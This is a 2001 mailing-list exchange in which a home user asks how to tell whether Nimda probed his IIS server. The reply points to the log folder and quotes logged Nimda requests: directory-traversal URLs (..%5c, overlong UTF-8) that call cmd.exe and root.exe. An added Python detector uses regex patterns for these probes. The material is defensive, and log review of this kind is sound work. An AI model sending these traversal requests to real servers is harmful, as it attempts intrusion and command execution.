RE: Re: IIS Worm
Thanks Mark
Pedro de Oliveira
-----Original Message-----
From: Mark Hetherington [mailto:mark.egroups@xxxxxxx]
Sent: 19 September 2001 10:39
To: ukha_d@xxxxxxx
Subject: [ukha_d] Re: IIS Worm
--- In ukha_d@y..., Pedro de Oliveira <oliveirp@B...> wrote:
> I am new to this IIS thing so any help would be appreciated. I am on a LAN
> and am serving via IIS. I know I was not affected by Nimda but would like
> to know if an attempt was made to infect me. I remember there is a log for
> these types of things but I can't remember for the life of me where it is.
> I am running Win2k Pro.
Pedro,
Look at the following location:
C:\WINNT\system32\LogFiles
This should have log files for most of your services. The W3SVC
directories relate to the web server logs.
An attack will look similar to this (note: IP addresses blanked for
privacy, first IP is the attacking machine, second is your web server
IP):
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir 403 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:02 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
HTH.
Mark.
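To turn Mark's "look for lines like these" advice into something repeatable, here is a small detector that reads IIS W3C extended log lines of the kind shown above and summarises Nimda-style probes per client address. This is an added example, not code from the original thread or from anyone on the list. It assumes the field order of the default IIS 5 W3C extended format (date, time, client IP, username, server IP, port, method, URI stem, URI query, status, user agent), which is what the excerpt's columns look like; a real log file carries a "#Fields:" directive and the parser uses that when present. The sample log embedded in the block is constructed: the first lines mirror the excerpt with documentation IP addresses, plus one benign request and one made-up line with status 200 to show what a successful hit, rather than a failed probe, would look like.

```python
"""Flag Nimda / Unicode-traversal probes in IIS W3C extended log lines.

Added example, not part of the original mailing-list post. The field
layout is assumed to be the IIS 5 default W3C extended format; a real
file carries a "#Fields:" directive and this parser honours it when one
is present.
"""
import re
from collections import defaultdict

# Assumed default IIS 5 W3C extended field list; it matches the column
# layout of the log excerpt in the post.
DEFAULT_FIELDS = ["date", "time", "c-ip", "cs-username", "s-ip", "s-port",
                  "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status",
                  "cs(User-Agent)"]

# What the worm asks for: root.exe (a copy of cmd.exe left behind by an
# earlier Code Red II infection), cmd.exe itself, and the "..%5c" /
# "..%2f" / overlong-UTF-8 ("%c1%1c", "%c0%af") traversal tricks.
# Patterns are matched against the raw stem, before any decoding,
# because the odd encoding is itself the signal.
PROBE_PATTERNS = [
    ("root.exe backdoor", re.compile(r"/root\.exe$", re.I)),
    ("cmd.exe requested", re.compile(r"/cmd\.exe$", re.I)),
    ("encoded traversal", re.compile(r"\.\.%(5c|2f)", re.I)),
    ("overlong UTF-8 traversal", re.compile(r"%c[01]%[0-9a-f]{2}", re.I)),
]

# Constructed sample: IPs are RFC 5737 documentation addresses; the
# final line (status 200) is made up to show a request that succeeded.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-09-19 00:05:59 192.0.2.10 - 198.51.100.5 80 GET /scripts/root.exe /c+dir 404 -
2001-09-19 00:05:59 192.0.2.10 - 198.51.100.5 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-19 00:05:59 192.0.2.10 - 198.51.100.5 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:02 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:07:15 192.0.2.77 - 198.51.100.5 80 GET /index.htm - 200 Mozilla/4.0
2001-09-19 00:09:41 192.0.2.33 - 198.51.100.5 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
"""


def parse_lines(lines):
    """Yield one dict per log record, honouring a #Fields: directive."""
    fields = DEFAULT_FIELDS
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue  # other directives (#Software:, #Date:, ...)
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed record; skip rather than misalign columns
        yield dict(zip(fields, parts))


def classify(stem):
    """Return the names of the probe patterns a raw URI stem matches."""
    return [name for name, rx in PROBE_PATTERNS if rx.search(stem)]


def find_probes(lines):
    """Summarise matching requests per client IP.

    Each entry holds the hit count, first and last timestamp, the kinds
    of probe seen, and the raw stem+query of any request that returned
    200, i.e. one the server actually executed rather than rejected.
    """
    summary = defaultdict(lambda: {"count": 0, "first": None, "last": None,
                                   "kinds": set(), "executed": []})
    for rec in parse_lines(lines):
        kinds = classify(rec["cs-uri-stem"])
        if not kinds:
            continue
        when = f'{rec["date"]} {rec["time"]}'
        entry = summary[rec["c-ip"]]
        entry["count"] += 1
        entry["first"] = entry["first"] or when
        entry["last"] = when
        entry["kinds"].update(kinds)
        if rec["sc-status"] == "200":
            entry["executed"].append(f'{rec["cs-uri-stem"]} {rec["cs-uri-query"]}')
    return dict(summary)


if __name__ == "__main__":
    for ip, info in find_probes(SAMPLE_LOG.splitlines()).items():
        print(f'{ip}: {info["count"]} probes, {info["first"]} .. {info["last"]}, '
              f'{sorted(info["kinds"])}')
        for hit in info["executed"]:
            print(f"  !! returned 200: {hit}")
```

Point it at a real file with `find_probes(open(r"C:\WINNT\system32\LogFiles\W3SVC1\ex010919.log"))`. In the excerpt every probe got a 403, 404 or 500, which is what a failed attempt looks like; the line to worry about is a cmd.exe or root.exe stem with status 200, since that means the command ran and the box needs to be treated as compromised, not merely scanned.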
For more information: http://www.automatedhome.co.uk
Post message: ukha_d@xxxxxxx
Subscribe: ukha_d-subscribe@xxxxxxx
Unsubscribe: ukha_d-unsubscribe@xxxxxxx
List owner: ukha_d-owner@xxxxxxx
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/